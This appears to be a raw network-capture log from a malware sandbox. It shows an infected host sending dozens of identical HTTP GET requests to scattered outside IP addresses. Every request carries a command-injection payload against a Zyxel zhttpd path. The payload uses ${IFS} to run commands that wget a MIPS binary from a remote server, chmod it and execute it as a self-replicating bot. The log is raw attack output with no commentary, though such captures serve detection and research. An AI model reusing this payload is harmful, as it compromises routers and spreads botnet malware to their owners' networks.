                                                        Jan 28, 2024 10:13:00.554434061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6277192.168.2.145623896.32.3.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554457903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6278192.168.2.1447064148.63.41.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554501057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6279192.168.2.1453460213.80.55.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554521084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6280192.168.2.1452978207.212.242.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554583073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6281192.168.2.1454252197.149.129.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554615974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6282192.168.2.1435912100.201.47.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554656982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6283192.168.2.1443834161.39.235.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554686069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6284192.168.2.1435226130.217.202.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554739952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6285192.168.2.1457336106.66.19.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554769039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6286192.168.2.1450732207.59.142.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554810047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6287192.168.2.1450850177.112.143.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554852962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6288192.168.2.1454432223.234.193.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554900885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6289192.168.2.1447536183.94.123.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554936886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6290192.168.2.1460312136.116.91.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554954052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6291192.168.2.145671865.255.46.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554999113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6292192.168.2.1455740149.51.236.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555059910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6293192.168.2.1439130142.80.7.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555090904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6294192.168.2.143914088.23.26.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555150032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6295192.168.2.1451748156.80.80.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555174112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6296192.168.2.143906896.217.2.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555227041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6297192.168.2.145519225.119.242.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555262089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6298192.168.2.1437998134.105.114.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555277109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6299192.168.2.1457056147.28.253.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555309057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6300192.168.2.1458804149.228.214.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555358887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6301192.168.2.1453994182.24.151.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555409908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6302192.168.2.1444612191.204.44.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555450916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6303192.168.2.1452510177.218.253.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555480003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6304192.168.2.143564860.69.127.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555500984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6305192.168.2.1449922158.212.218.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555525064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6306192.168.2.1458766129.248.112.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555579901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6307192.168.2.144243289.33.98.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555612087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6308192.168.2.1436274189.159.198.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555671930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6309192.168.2.1458788149.156.33.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555706978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6310192.168.2.1460438223.164.228.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555757046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6311192.168.2.1454114209.78.183.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555788040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6312192.168.2.1436964128.42.40.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555833101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6313192.168.2.1435326153.17.115.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555865049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6314192.168.2.145286895.148.45.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555917025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6315192.168.2.1443442210.2.232.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555953979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6316192.168.2.143375844.152.103.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.555989027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6317192.168.2.145982678.140.94.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556025982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6318192.168.2.146046239.68.57.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556062937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6319192.168.2.145930094.165.127.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556094885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6320192.168.2.145535061.148.214.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556116104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6321192.168.2.1438158212.226.101.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556145906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6322192.168.2.1459306119.159.57.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556201935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6323192.168.2.143667667.63.204.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556236029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6324192.168.2.1456210114.47.97.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556271076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6325192.168.2.1454386128.255.238.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556308985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6326192.168.2.1446618115.5.228.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556345940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6327192.168.2.1449230147.92.24.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556375980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6328192.168.2.1446776202.89.77.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556397915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6329192.168.2.144945058.13.168.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556427002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6330192.168.2.143764212.39.250.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556476116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6331192.168.2.1442706191.159.150.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556497097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6332192.168.2.14401804.223.128.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556529045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6333192.168.2.14370048.132.236.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556561947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6334192.168.2.1444646169.82.34.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556610107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6335192.168.2.1444294178.43.110.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556636095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6336192.168.2.1448274146.16.142.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.556682110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6337192.168.2.1446806193.238.82.80443
                                                        TimestampBytes transferredDirectionData
